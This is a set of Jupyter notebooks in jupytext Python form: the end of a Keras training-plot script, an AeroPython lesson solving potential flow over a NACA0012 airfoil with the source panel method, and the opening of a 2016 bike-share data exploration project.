loss_list = history.history['loss']
acc_list = history.history['acc']
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.plot(epoch_list,loss_list, label = 'Loss')
plt.show()
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.plot(epoch_list,acc_list, label = 'Accuracy')
plt.show()
# -
# # Testing the Data
loss,acc = model.evaluate(test_x,test_y)
print('Test Loss = {}'.format(loss))
print('Test Accuracy = {}'.format(acc))
|
Train Test.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ###### Content provided under a Creative Commons Attribution license, CC-BY 4.0; code under MIT license. (c)2014 <NAME>, <NAME>. Thanks: NSF for support via CAREER award #1149784.
# ##### Version 0.4 -- April 2015
# # Source panel method
# We are now getting close to the finish line with *AeroPython*! Our first few lessons introduced the fundamental flow solutions of potential flow, and we quickly learned that using our superposition powers we could get some useful results in aerodynamics.
#
# The superposition of a [doublet](03_Lesson03_doublet.ipynb) and a free stream gave the flow around a circular cylinder, and we learned about the *D'Alembert paradox*: the result of zero drag for potential flow around a cylinder. Adding a [vortex](06_Lesson06_vortexLift.ipynb) at the center of the cylinder, we learned about lift and the *Kutta-Joukowski theorem* stating that lift is proportional to circulation: $L=\rho U \Gamma$. A most important result!
#
# Adding together fundamental solutions of potential flow and seeing what we get when interpreting a dividing streamline as a solid body is often called an *indirect method*. This method goes all the way back to Rankine in 1871! But its applicability is limited because we can't stipulate a geometry and find the flow associated to it.
#
# In [Lesson 9](09_Lesson09_flowOverCylinder.ipynb), we learned that it is possible to stipulate first the geometry, and then solve for the source strengths on a panel discretization of the body that makes the flow tangent at the boundary. This is called a *direct method* and it took off in the 1960s with the work of <NAME> Smith at Douglas Aircraft Company.
#
# A set of panels (line segments in 2D) can represent the surface of any solid body immersed in a potential flow by making the source-sheet strengths such that the normal velocity at each panel is equal to zero. This is a very powerful idea! But you should realize that all the panel strengths are coupled to each other, which is why we end up with a linear system of equations.
#
# For an arbitrary geometry, we need to build a set of panels according to some points that define the geometry. In this lesson, we will read from a file a geometry definition corresponding to a **NACA0012 airfoil**, create a set of panels, and solve for the source-sheet strengths to get flow around the airfoil.
#
# *Make sure you have studied [Lesson 9](09_Lesson09_flowOverCylinder.ipynb) carefully before proceeding!* We will not repeat the full mathematical formulation in this notebook, so refer back as needed.
#
# First, load our favorite Python libraries, and the `integrate` module from SciPy:
import os
import math
import numpy
from scipy import integrate
from matplotlib import pyplot
# display the figures in the Notebook
# %matplotlib inline
# Next, we read the body geometry from a file using the NumPy function [`loadtxt()`](http://docs.scipy.org/doc/numpy/reference/generated/numpy.loadtxt.html). The file comes from the [Airfoil Tools](http://airfoiltools.com/airfoil/details?airfoil=n0012-il) website and it contains a set of coordinates for the standard NACA0012 symmetric profile. We saved the file in the `resources` folder and load it from our local copy.
#
# The geometry points get loaded into one NumPy array, so we separate the data into two arrays: `x,y` (for better code readability). The subsequent code will plot the geometry of the airfoil.
# +
# read the geometry from a data file
naca_filepath = os.path.join('resources', 'naca0012.dat')
with open (naca_filepath, 'r') as file_name:
x, y = numpy.loadtxt(file_name, dtype=float, delimiter='\t', unpack=True)
# plot the geometry
width = 10
pyplot.figure(figsize=(width, width))
pyplot.grid()
pyplot.xlabel('x', fontsize=16)
pyplot.ylabel('y', fontsize=16)
pyplot.plot(x, y, color='k', linestyle='-', linewidth=2)
pyplot.axis('scaled', adjustable='box')
pyplot.xlim(-0.1, 1.1)
pyplot.ylim(-0.1, 0.1);
# -
# ## Discretization into panels
# Like in [Lesson 9](09_Lesson09_flowOverCylinder.ipynb), we will create a discretization of the body geometry into panels (line segments in 2D). A panel's attributes are: its starting point, end point and mid-point, its length and its orientation. See the following figure for the nomenclature used in the code and equations below.
#
# <img src="./resources/panelSketch.png" width="400">
# We can modify the `Panel` class from our previous notebook slightly, to work better for our study of flow over an airfoil. The only difference is that we identify points on the top or bottom surfaces with the words `upper` and `lower`, which is only used later for plotting results with different colors for the top and bottom surfaces of the profile.
class Panel:
    """
    A straight source panel: its end-points, control point, length,
    orientation, surface side, and the flow quantities attached to it.
    """
    def __init__(self, xa, ya, xb, yb):
        """
        Builds a panel from its two end-points.

        Computes the control (center) point, the length, and the angle
        beta between the x-axis and the panel's normal, then labels the
        panel as lying on the 'upper' or 'lower' surface of the geometry.
        The source strength, tangential velocity, and pressure coefficient
        are initialized to zero.

        Parameters
        ----------
        xa: float
            x-coordinate of the first end-point.
        ya: float
            y-coordinate of the first end-point.
        xb: float
            x-coordinate of the second end-point.
        yb: float
            y-coordinate of the second end-point.
        """
        self.xa, self.ya = xa, ya
        self.xb, self.yb = xb, yb
        # control point sits halfway along the panel
        self.xc = (xa + xb) / 2
        self.yc = (ya + yb) / 2
        dx, dy = xb - xa, yb - ya
        self.length = math.sqrt(dx**2 + dy**2)
        # orientation: angle between the x-axis and the panel's normal
        if dx <= 0.0:
            self.beta = math.acos(dy / self.length)
        else:
            self.beta = math.pi + math.acos(-dy / self.length)
        # panels whose normal points upward (beta <= pi) lie on the upper surface
        self.loc = 'upper' if self.beta <= math.pi else 'lower'
        self.sigma = 0.0  # source strength
        self.vt = 0.0     # tangential velocity
        self.cp = 0.0     # pressure coefficient
# For the circular cylinder, the discretization into panels was really easy. This is the part that gets more complicated when you want to compute the flow around a general geometry, while the solution part is effectively the same as in [Lesson 9](09_Lesson09_flowOverCylinder.ipynb).
#
# The function below will create the panels from the geometry data that was read from a file. It is better to have small panels near the leading-edge and the trailing edge, where the curvature is large. One method to get a non uniform distribution around the airfoil is to first discretize a circle with diameter equal to the airfoil's chord, with the leading edge and trailing edge touching the circle at a node, as shown in the following sketch.
#
# <img src="./resources/naca0012_in_circle.png" width="300">
# Then, we store the $x$-coordinates of the circle points, `x_circle`, which will also be the $x$-coordinates of the panel nodes, `x`, and project the $y$-coordinates of the circle points onto the airfoil by interpolation. We end up with a node distribution on the airfoil that is refined near the leading edge and the trailing edge. It will look like this:
#
# <img src="./resources/naca0012_discretized_in_circle.png" width="300">
# With the discretization method just described, the function `define_panels()` returns an array of objects, each an instance of the class `Panel` and containing all information about a panel, given the desired number of panels and the set of body coordinates.
#
# A few remarks about the implementation of the function `define_panels()`:
#
# * we just need to compute the $x$-coordinates of the circle (`x_circle`) since the $y$-coordinates of the panel nodes will be computed by interpolation;
# * we create a circle with `N+1` points, but the first and last points coincide;
# * we extend our NumPy arrays by adding an extra value that is equal to the first one; thus we don't have to do anything special with the value `x[i+1]` in the different loops;
# * the *while*-loop is used to find two consecutive points, (`x[I]`,`y[I]`) and (`x[I+1]`,`y[I+1]`), on the foil such that the interval [`x[I]`,`x[I+1]`] contains the value `x_ends[i]`; we use the keyword `break` to get out of the loop;
# * once the two points have been identified, the value `y_ends[i]` is computed by interpolation.
def define_panels(x, y, N=40):
    """
    Discretizes the geometry into panels using the 'cosine' method.

    The x-locations of the panel nodes come from projecting a circle of
    diameter equal to the chord onto the x-axis, which clusters nodes near
    the leading and trailing edges; the y-locations follow by linear
    interpolation of the geometry points.

    Parameters
    ----------
    x: 1D array of floats
        x-coordinate of the points defining the geometry.
    y: 1D array of floats
        y-coordinate of the points defining the geometry.
    N: integer, optional
        Number of panels;
        default: 40.

    Returns
    -------
    panels: 1D Numpy array of Panel objects
        The discretization of the geometry into panels.
    """
    radius = (x.max() - x.min()) / 2    # radius of the projection circle
    x_center = (x.max() + x.min()) / 2  # x-coordinate of its center

    # x-coordinates of the panel nodes: circle points projected on the chord
    # (N + 1 points; the first and last coincide)
    theta = numpy.linspace(0.0, 2 * math.pi, N + 1)
    x_ends = numpy.copy(x_center + radius * numpy.cos(theta))
    y_ends = numpy.empty_like(x_ends)

    # close the geometry so x[I + 1] is always a valid index below
    x, y = numpy.append(x, x[0]), numpy.append(y, y[0])

    # interpolate each node's y-coordinate from the two geometry points that
    # bracket it; I only advances because the nodes sweep the surface in order
    I = 0
    for i in range(N):
        while I < len(x) - 1:
            if (x[I] <= x_ends[i] <= x[I + 1]) or (x[I + 1] <= x_ends[i] <= x[I]):
                break
            I += 1
        slope = (y[I + 1] - y[I]) / (x[I + 1] - x[I])
        intercept = y[I + 1] - slope * x[I + 1]
        y_ends[i] = slope * x_ends[i] + intercept
    y_ends[N] = y_ends[0]

    panels = numpy.empty(N, dtype=object)
    for i in range(N):
        panels[i] = Panel(x_ends[i], y_ends[i], x_ends[i + 1], y_ends[i + 1])
    return panels
# Now we can use this function, calling it with a desired number of panels whenever we execute the cell below. We also plot the resulting geometry.
# +
N = 40 # number of panels
panels = define_panels(x, y, N) # discretizes of the geometry into panels
# plot the geometry and the panels
width = 10
pyplot.figure(figsize=(width, width))
pyplot.grid()
pyplot.xlabel('x', fontsize=16)
pyplot.ylabel('y', fontsize=16)
pyplot.plot(x, y, color='k', linestyle='-', linewidth=2)
pyplot.plot(numpy.append([panel.xa for panel in panels], panels[0].xa),
numpy.append([panel.ya for panel in panels], panels[0].ya),
linestyle='-', linewidth=1, marker='o', markersize=6, color='#CD2305')
pyplot.axis('scaled', adjustable='box')
pyplot.xlim(-0.1, 1.1)
pyplot.ylim(-0.1, 0.1);
# -
# ## Freestream conditions
# The NACA0012 airfoil will be immersed in a uniform flow with velocity $U_\infty$ and an angle of attack $\alpha=0$. Even though it may seem like overkill to create a class for the freestream, we'll do it anyway. When creating a class, one is expecting to also create several instances of its objects. Here, we just have one freestream, so why define a class? Well, it makes the code more readable and does not block the programmer from using the variable names `u_inf` and `alpha` for something else outside of the class.
# Also, every time we need the freestream condition as input to a function, we will just have to pass the object as an argument and not all the attributes of the freestream.
class Freestream:
    """
    Uniform freestream: speed and angle of attack (stored in radians).
    """
    def __init__(self, u_inf=1.0, alpha=0.0):
        """
        Sets the freestream speed and angle (with the x-axis).

        Parameters
        ----------
        u_inf: float, optional
            Freestream speed;
            default: 1.0.
        alpha: float, optional
            Angle of attack in degrees;
            default: 0.0.
        """
        self.u_inf = u_inf
        # convert once to radians for the trigonometric calls downstream
        self.alpha = numpy.radians(alpha)
# define and create the freestream object
u_inf = 1.0 # freestream speed
alpha = 0.0 # angle of attack (in degrees)
freestream = Freestream(u_inf, alpha) # instantiation of the object freestream
# ## Flow tangency boundary condition
# Enforcing the flow-tangency condition on each *control point* approximately makes the body geometry correspond to a dividing streamline (and the approximation improves if we represented the body with more and more panels). So, for each panel $i$, we make $u_n=0$ at $(x_{c_i},y_{c_i})$, which leads to the equation derived in the previous lesson:
#
# $$
# \begin{equation}
# u_{n_i} = \frac{\partial}{\partial n_i}\left\lbrace \phi\left(x_{c_i},y_{c_i}\right) \right\rbrace = 0
# \end{equation}
# $$
#
# i.e.
#
# $$
# \begin{equation}
# \begin{split}
# 0 = & U_\infty \cos\beta_i + \frac{\sigma_i}{2} \\
# & + \sum_{j=1,j\neq i}^{N_p} \frac{\sigma_j}{2\pi} \int \frac{\left(x_{c_i}-x_j(s_j)\right) \cos\beta_i + \left(y_{c_i}-y_j(s_j)\right) \sin\beta_i}{\left(x_{c_i}-x_j(s)\right)^2 + \left(y_{c_i}-y_j(s)\right)^2} {\rm d}s_j
# \end{split}
# \end{equation}
# $$
# In the equation above, we calculate the derivative of the potential in the normal direction to enforce the flow tangency condition on each panel. But later, we will have to calculate the derivative in the tangential direction to compute the surface pressure coefficient. And, when we are interested in plotting the velocity field onto a mesh, we will have to calculate the derivative in the $x$- and $y$-direction.
#
# Therefore the function below is similar to the one implemented in [Lesson 9](09_Lesson09_flowOverCylinder.ipynb) to obtain the integrals along each panel, but we've generalized it to adapt to the direction of derivation (by means of two new arguments, `dxdz` and `dydz`, which respectively represent the value of $\frac{\partial x_{c_i}}{\partial z_i}$ and $\frac{\partial y_{c_i}}{\partial z_i}$, $z_i$ being the desired direction).
#
# Moreover, the function is also more general in the sense of allowing any evaluation point, not just a control point on a panel (the argument `p_i` has been replaced by the coordinates `x` and `y` of the control-point, and `p_j` has been replaced with `panel`).
def integral(x, y, panel, dxdz, dydz):
    """
    Evaluates the contribution of a panel at one point.

    The integrand is the derivative, along the direction defined by
    (dxdz, dydz), of the potential induced at (x, y) by a unit-strength
    source distribution on the panel.

    Parameters
    ----------
    x: float
        x-coordinate of the target point.
    y: float
        y-coordinate of the target point.
    panel: Panel object
        Source panel which contribution is evaluated.
    dxdz: float
        Derivative of x in the z-direction.
    dydz: float
        Derivative of y in the z-direction.

    Returns
    -------
    Integral over the panel of the influence at the given target point.
    """
    # direction cosines of the panel are constant along it — hoist them
    sin_beta = math.sin(panel.beta)
    cos_beta = math.cos(panel.beta)

    def integrand(s):
        # vector from the point at arc-length s on the panel to the target
        dx = x - (panel.xa - sin_beta * s)
        dy = y - (panel.ya + cos_beta * s)
        return (dx * dxdz + dy * dydz) / (dx**2 + dy**2)

    return integrate.quad(integrand, 0.0, panel.length)[0]
# ## Building the linear system
# Here, we build and solve the linear system of equations of the form
#
# $$
# \begin{equation}
# [A][\sigma] = [b]
# \end{equation}
# $$
#
# In building the matrix, below, we call the `integral()` function with the correct values for the last parameters: $\cos \beta_i$ and $\sin\beta_i$, corresponding to a derivative in the normal direction.
#
# Finally, we use `linalg.solve()` from NumPy to solve the system and find the strength of each panel.
# +
def build_matrix(panels):
    """
    Builds the source-influence matrix.

    The diagonal holds each panel's self-influence (1/2); every off-diagonal
    entry is the normal-direction influence of panel j evaluated at panel i's
    control point.

    Parameters
    ----------
    panels: 1D array of Panel object
        The source panels.

    Returns
    -------
    A: 2D Numpy array of floats
        The source matrix (NxN matrix; N is the number of panels).
    """
    N = len(panels)
    A = numpy.empty((N, N), dtype=float)
    numpy.fill_diagonal(A, 0.5)  # self-influence of a source panel
    for i, p_i in enumerate(panels):
        # normal direction at panel i is the same for every j — hoist it
        cos_b, sin_b = math.cos(p_i.beta), math.sin(p_i.beta)
        for j, p_j in enumerate(panels):
            if i == j:
                continue
            A[i, j] = 0.5 / math.pi * integral(p_i.xc, p_i.yc, p_j, cos_b, sin_b)
    return A
def build_rhs(panels, freestream):
    """
    Builds the RHS of the linear system.

    Each entry is minus the component of the freestream velocity along the
    normal of the corresponding panel.

    Parameters
    ----------
    panels: 1D array of Panel objects
        The source panels.
    freestream: Freestream object
        The freestream conditions.

    Returns
    -------
    b: 1D Numpy array of floats
        RHS of the linear system.
    """
    return numpy.array([-freestream.u_inf * math.cos(freestream.alpha - panel.beta)
                        for panel in panels])
# -
A = build_matrix(panels) # compute the singularity matrix
b = build_rhs(panels, freestream) # compute the freestream RHS
# +
# solve the linear system
sigma = numpy.linalg.solve(A, b)
for i, panel in enumerate(panels):
panel.sigma = sigma[i]
# -
# ## Surface pressure coefficient
# From Bernoulli's equation, the pressure coefficient on the $i$-th panel is
#
# $$
# \begin{equation}
# C_{p_i} = 1-\left(\frac{u_{t_i}}{U_\infty}\right)^2
# \end{equation}
# $$
#
# where $u_{t_i}$ is the tangential component of the velocity at the center point of the $i$-th panel,
#
# $$
# \begin{equation}
# \begin{split}
# u_{t_i} = & -U_\infty \sin\beta_i \\
# & + \sum_{j=1}^{N_p} \frac{\sigma_j}{2\pi} \int \frac{\left(x_{c_i}-x_j(s_j)\right) \frac{\partial x_{c_i}}{\partial t_i} + \left(y_{c_i}-y_j(s_j)\right) \frac{\partial y_{c_i}}{\partial t_i}}{\left(x_{c_i}-x_j(s)\right)^2 + \left(y_{c_i}-y_j(s)\right)^2} {\rm d}s_j
# \end{split}
# \end{equation}
# $$
#
# with
#
# $$
# \begin{equation}
# \frac{\partial x_{c_i}}{\partial t_i} = -\sin\beta_i \quad\text{and} \quad \frac{\partial y_{c_i}}{\partial t_i} = \cos\beta_i
# \end{equation}
# $$
#
# Notice that below we call the function `integral()` with different arguments: $-\sin\beta_i$ and $\cos\beta_i$ to get the derivation in the tangential direction.
def get_tangential_velocity(panels, freestream):
    """
    Computes the tangential velocity on the surface of the panels.

    Builds the tangential-influence matrix (zero self-influence), adds the
    freestream's tangential component, and stores the resulting velocity in
    each panel's ``vt`` attribute.

    Parameters
    ---------
    panels: 1D array of Panel objects
        The source panels.
    freestream: Freestream object
        The freestream conditions.
    """
    N = len(panels)
    # a source panel induces no tangential velocity on itself -> zero diagonal
    A = numpy.zeros((N, N), dtype=float)
    for i, p_i in enumerate(panels):
        # tangential direction at panel i: (-sin(beta), cos(beta))
        tx, ty = -math.sin(p_i.beta), math.cos(p_i.beta)
        for j, p_j in enumerate(panels):
            if i == j:
                continue
            A[i, j] = 0.5 / math.pi * integral(p_i.xc, p_i.yc, p_j, tx, ty)

    b = freestream.u_inf * numpy.sin([freestream.alpha - panel.beta
                                      for panel in panels])
    sigma = numpy.array([panel.sigma for panel in panels])
    vt = numpy.dot(A, sigma) + b
    for panel, velocity in zip(panels, vt):
        panel.vt = velocity
# compute the tangential velocity at the center-point of each panel
get_tangential_velocity(panels, freestream)
def get_pressure_coefficient(panels, freestream):
    """
    Computes the surface pressure coefficients on the panels.

    Applies Bernoulli's relation Cp = 1 - (vt / U_inf)^2 and stores the
    result in each panel's ``cp`` attribute.

    Parameters
    ---------
    panels: 1D array of Panel objects
        The source panels.
    freestream: Freestream object
        The freestream conditions.
    """
    u_inf = freestream.u_inf
    for panel in panels:
        panel.cp = 1.0 - (panel.vt / u_inf)**2
# computes the surface pressure coefficients
get_pressure_coefficient(panels, freestream)
# ### Theoretical solution
# There is a classical method to obtain the theoretical characteristics of airfoils, known as *Theodorsen's method*. It uses the Joukowski transformation but is able to deal with any airfoil by an additional transformation between a "near circle" and a circle. The method is hairy indeed! But the resulting values of pressure coefficient are provided for some airfoils in table form in the 1945 [NACA Report No.824](http://ntrs.nasa.gov/archive/nasa/casi.ntrs.nasa.gov/19930090976.pdf), available from the NASA web server (see p. 71).
#
# The values of $(u/U_{\infty})^2$ are given for several stations along the chord length. We transcribed them here, saving them into an array:
voverVsquared=numpy.array([0.0, 0.64, 1.01, 1.241, 1.378, 1.402, 1.411, 1.411,
1.399, 1.378, 1.35, 1.288, 1.228, 1.166, 1.109, 1.044,
0.956, 0.906, 0.0])
print(voverVsquared)
xtheo=numpy.array([0.0, 0.5, 1.25, 2.5, 5.0, 7.5, 10.0, 15.0, 20.0, 25.0, 30.0,
40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 95.0, 100.0])
xtheo /= 100
print(xtheo)
# ### And plot the result!
# We will use the values from the NACA report (also given in the book by Abbot and <NAME>, ["Theory of Wing Sections,"](http://books.google.com/books/about/Theory_of_Wing_Sections_Including_a_Summ.html?id=DPZYUGNyuboC) 1949) to visually compare the pressure distribution with the result of our source panel method. Let's see how it looks!
# plot the surface pressure coefficient
pyplot.figure(figsize=(10, 6))
pyplot.grid()
pyplot.xlabel('x', fontsize=16)
pyplot.ylabel('$C_p$', fontsize=16)
pyplot.plot([panel.xc for panel in panels if panel.loc == 'upper'],
[panel.cp for panel in panels if panel.loc == 'upper'],
label='upper',
color='r', linewidth=1, marker='x', markersize=8)
pyplot.plot([panel.xc for panel in panels if panel.loc == 'lower'],
[panel.cp for panel in panels if panel.loc == 'lower'],
label='lower',
color='b', linewidth=0, marker='d', markersize=6)
pyplot.plot(xtheo, 1-voverVsquared,
label='theoretical',
color='k', linestyle='--',linewidth=2)
pyplot.legend(loc='best', prop={'size':14})
pyplot.xlim(-0.1, 1.1)
pyplot.ylim(1.0, -0.6)
pyplot.title('Number of panels : {}'.format(N));
# That looks pretty good! The only place where the panel method doesn't quite match the tabulated data from Theodorsen's method is at the trailing edge. But note that the flow-tangency boundary condition in the panel method is applied at the control point of the panel (not at the endpoints), so this discrepancy is not surprising.
# ##### Accuracy check
# For a closed body, the sum of all the source strengths must be zero. If not, it means the body would be adding or absorbing mass from the flow! Therefore, we should have
#
# $$
# \sum_{j=1}^{N} \sigma_j l_j = 0
# $$
#
# where $l_j$ is the length of the $j^{\text{th}}$ panel.
#
# With this, we can get a get an idea of the accuracy of the source panel method.
# calculate the accuracy
accuracy = sum([panel.sigma*panel.length for panel in panels])
print('--> sum of source/sink strengths: {}'.format(accuracy))
# ## Streamlines onto a mesh grid
# To get a streamline plot, we have to create a mesh (like we've done in all *AeroPython* lessons!) and compute the velocity field onto it. Knowing the strength of every panel, we find the $x$-component of the velocity by taking derivative of the velocity potential in the $x$-direction, and the $y$-component by taking derivative in the $y$-direction:
#
# $$
# u\left(x,y\right) = \frac{\partial}{\partial x}\left\lbrace \phi\left(x,y\right) \right\rbrace
# $$
#
# $$
# v\left(x,y\right) = \frac{\partial}{\partial y}\left\lbrace \phi\left(x,y\right) \right\rbrace
# $$
#
# Notice that here we call the function `integral()` with $1,0$ as the final arguments when calculating the derivatives in the $x$-direction, and $0,1$ for the derivatives in the $y$-direction.
#
# In addition, we use the function `numpy.vectorize()` (as we did in [Lesson 8](08_Lesson08_sourceSheet.ipynb)) to avoid the nested loops over the domain.
def get_velocity_field(panels, freestream, X, Y):
    """
    Compute the velocity field on a given 2D mesh.

    Parameters
    ---------
    panels: 1D array of Panel objects
        The source panels.
    freestream: Freestream object
        The freestream conditions.
    X: 2D Numpy array of floats
        x-coordinates of the mesh points.
    Y: 2D Numpy array of floats
        y-coordinates of the mesh points.

    Returns
    -------
    u: 2D Numpy array of floats
        x-component of the velocity vector field.
    v: 2D Numpy array of floats
        y-component of the velocity vector field.
    """
    # start from the uniform freestream contribution
    alpha = freestream.alpha
    u = freestream.u_inf * math.cos(alpha) * numpy.ones_like(X, dtype=float)
    v = freestream.u_inf * math.sin(alpha) * numpy.ones_like(X, dtype=float)
    # vectorized integral lets us evaluate every mesh point without nested loops;
    # the trailing (1,0)/(0,1) arguments select d/dx vs d/dy of the potential
    integral_vec = numpy.vectorize(integral)
    # superpose the contribution of every source panel
    for panel in panels:
        strength = panel.sigma / (2.0 * math.pi)
        u = u + strength * integral_vec(X, Y, panel, 1.0, 0.0)
        v = v + strength * integral_vec(X, Y, panel, 0.0, 1.0)
    return u, v
# +
# define a mesh grid covering the airfoil and some surrounding flow
nx, ny = 20, 20 # number of points in the x and y directions
x_start, x_end = -1.0, 2.0
y_start, y_end = -0.3, 0.3
X, Y = numpy.meshgrid(numpy.linspace(x_start, x_end, nx),
                      numpy.linspace(y_start, y_end, ny))
# compute the velocity field on the mesh grid
# (superposes the freestream and the contribution of every source panel)
u, v = get_velocity_field(panels, freestream, X, Y)
# -
# plot the velocity field
width = 10
pyplot.figure(figsize=(width, width))
pyplot.xlabel('x', fontsize=16)
pyplot.ylabel('y', fontsize=16)
pyplot.streamplot(X, Y, u, v,
                  density=1, linewidth=1, arrowsize=1, arrowstyle='->')
# fill the airfoil outline (panel control points) so the body is drawn solid
pyplot.fill([panel.xc for panel in panels],
            [panel.yc for panel in panels],
            color='k', linestyle='solid', linewidth=2, zorder=2)
pyplot.axis('scaled', adjustable='box')
pyplot.xlim(x_start, x_end)
pyplot.ylim(y_start, y_end)
pyplot.title('Streamlines around a NACA 0012 airfoil (AoA = ${}^o$)'.format(alpha),
             fontsize=16);
# We can now calculate the pressure coefficient. In Lesson 9, we computed the pressure coefficient on the surface of the circular cylinder. That was useful because we have an analytical solution for the surface pressure on a cylinder in potential flow. For an airfoil, we are interested to see how the pressure looks all around it, and we make a contour plot in the flow domain.
# +
# compute the pressure field
# pressure coefficient from Bernoulli: Cp = 1 - |V|^2 / U_inf^2
cp = 1.0 - (u**2 + v**2) / freestream.u_inf**2
# plot the pressure field as filled contours with a horizontal colorbar
width = 10
pyplot.figure(figsize=(width, width))
pyplot.xlabel('x', fontsize=16)
pyplot.ylabel('y', fontsize=16)
contf = pyplot.contourf(X, Y, cp,
                        levels=numpy.linspace(-2.0, 1.0, 100), extend='both')
cbar = pyplot.colorbar(contf,
                       orientation='horizontal',
                       shrink=0.5, pad = 0.1,
                       ticks=[-2.0, -1.0, 0.0, 1.0])
cbar.set_label('$C_p$', fontsize=16)
# draw the airfoil body over the contours
pyplot.fill([panel.xc for panel in panels],
            [panel.yc for panel in panels],
            color='k', linestyle='solid', linewidth=2, zorder=2)
pyplot.axis('scaled', adjustable='box')
pyplot.xlim(x_start, x_end)
pyplot.ylim(y_start, y_end)
pyplot.title('Contour of pressure field', fontsize=16);
# -
# ### Final words
#
# We've learned to use a source-sheet to represent any solid body: first a [circular cylinder](09_Lesson09_flowOverCylinder.ipynb) (which we knew we could get by superposing a doublet and a freestream), and now an airfoil.
#
# But what is the feature of airfoils that makes them interesting? Well, the fact that we can use them to generate lift and make things that fly, of course! But what do we need to generate lift? Think, think ... what is it?
# ## References
# 1. [Airfoil Tools](http://airfoiltools.com/index), website providing airfoil data.
# 1. <NAME>, <NAME> and <NAME>, Jr. (1945), "Summary of Airfoil Data," NACA Report No.824, [PDF on the NASA web server](http://ntrs.nasa.gov/archive/nasa/casi.ntrs.nasa.gov/19930090976.pdf) (see p. 71)
# 1. <NAME>, <NAME>, "Theory of Wing Sections, Including a Summary of Airfoil Data" (1949), Dover Press.
#
# A further reference on Theodorsen's method is:
#
# * <NAME>, <NAME> (1991), "Conformal Mapping: Methods and Applications." Dover edition in 2003. [Read on Google Books](https://books.google.com/books?id=qe-7AQAAQBAJ&lpg=PA128&ots=wbg0jLlqq5&dq=method%20theodorsen&pg=PA128#v=onepage&q=%22method%20of%20theodorsen%20and%20garrick%22&f=false)
#
# ---
# ###### Please ignore the cell below. It just loads our style for the notebook.
from IPython.core.display import HTML
def css_styling(filepath):
    """Load a CSS file and return it wrapped as HTML to style the notebook.

    Uses a context manager so the file handle is closed promptly; the
    original left the file open until garbage collection.
    """
    with open(filepath, 'r') as f:
        styles = f.read()
    return HTML(styles)
css_styling('../styles/custom.css')
|
lessons/10_Lesson10_sourcePanelMethod.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 2016 US Bike Share Activity Snapshot
#
# ## Table of Contents
# - [Introduction](#intro)
# - [Posing Questions](#pose_questions)
# - [Data Collection and Wrangling](#wrangling)
# - [Condensing the Trip Data](#condensing)
# - [Exploratory Data Analysis](#eda)
# - [Statistics](#statistics)
# - [Visualizations](#visualizations)
# - [Performing Your Own Analysis](#eda_continued)
# - [Conclusions](#conclusions)
#
# <a id='intro'></a>
# ## Introduction
#
#
# Over the past decade, bicycle-sharing systems have been growing in number and popularity in cities across the world. Bicycle-sharing systems allow users to rent bicycles for short trips, typically 30 minutes or less. Thanks to the rise in information technologies, it is easy for a user of the system to access a dock within the system to unlock or return bicycles. These technologies also provide a wealth of data that can be used to explore how these bike-sharing systems are used.
#
# In this project, you will perform an exploratory analysis on data provided by [Motivate](https://www.motivateco.com/), a bike-share system provider for many major cities in the United States. You will compare the system usage between three large cities: New York City, Chicago, and Washington, DC. You will also see if there are any differences within each system for those users that are registered, regular users and those users that are short-term, casual users.
# <a id='pose_questions'></a>
# ## Posing Questions
#
#
# **Question 1**: Write at least two questions related to bike sharing that you think could be answered by data.
#
# **Answer**: What is the most common time of use?
# What is the most common month, and which type of user rides the most?
#
# <a id='wrangling'></a>
# ## Data Collection and Wrangling
#
# Now it's time to collect and explore our data. In this project, we will focus on the record of individual trips taken in 2016 from our selected cities: New York City, Chicago, and Washington, DC. Each of these cities has a page where we can freely download the trip data.:
#
# - New York City (Citi Bike): [Link](https://www.citibikenyc.com/system-data)
# - Chicago (Divvy): [Link](https://www.divvybikes.com/system-data)
# - Washington, DC (Capital Bikeshare): [Link](https://www.capitalbikeshare.com/system-data)
#
# If you visit these pages, you will notice that each city has a different way of delivering its data. Chicago updates with new data twice a year, Washington DC is quarterly, and New York City is monthly. **However, you do not need to download the data yourself.** The data has already been collected for you in the `/data/` folder of the project files. While the original data for 2016 is spread among multiple files for each city, the files in the `/data/` folder collect all of the trip data for the year into one file per city. Some data wrangling of inconsistencies in timestamp format within each city has already been performed for you. In addition, a random 2% sample of the original data is taken to make the exploration more manageable.
#
# **Question 2**: However, there is still a lot of data for us to investigate, so it's a good idea to start off by looking at one entry from each of the cities we're going to analyze. Run the first code cell below to load some packages and functions that you'll be using in your analysis. Then, complete the second code cell to print out the first trip recorded from each of the cities (the second line of each data file).
#
#
## import all necessary packages and functions.
import csv # read and write csv files
from datetime import datetime # operations to parse dates
from pprint import pprint # use to print data structures like dictionaries in
import pandas as pd # a nicer way than the base print function.
# +
def print_first_point(filename):
    """
    Print and return the first data point (second row) from a csv file
    that includes a header row.

    Returns a tuple (city, first_trip) where city is parsed from the file
    name and first_trip is the first data row as a dict.
    """
    # city name is the path segment before the first '-' in the file name
    city = filename.split('-')[0].split('/')[-1]
    print('\nCity: {}'.format(city))
    with open(filename, 'r') as f_in:
        # DictReader consumes the header row and yields each row as a dict
        first_trip = next(csv.DictReader(f_in))
    print("first trip details")
    pprint(first_trip)
    print(type(first_trip))
    # output city name and first trip for later testing
    return (city, first_trip)
# list of files for each city
data_files = ['./data/NYC-CitiBike-2016.csv',
              './data/Chicago-Divvy-2016.csv',
              './data/Washington-CapitalBikeshare-2016.csv',]
# print the first trip from each file, store in dictionary
# keyed by city name (e.g. example_trips['NYC']) for the later assert cells
example_trips = {}
for data_file in data_files:
    city, first_trip = print_first_point(data_file)
    example_trips[city] = first_trip
# -
# If everything has been filled out correctly, you should see below the printout of each city name (which has been parsed from the data file name) that the first trip has been parsed in the form of a dictionary. When you set up a `DictReader` object, the first row of the data file is normally interpreted as column names. Every other row in the data file will use those column names as keys, as a dictionary is generated for each row.
#
# This will be useful since we can refer to quantities by an easily-understandable label instead of just a numeric index. For example, if we have a trip stored in the variable `row`, then we would rather get the trip duration from `row['duration']` instead of `row[0]`.
#
# <a id='condensing'></a>
# ### Condensing the Trip Data
#
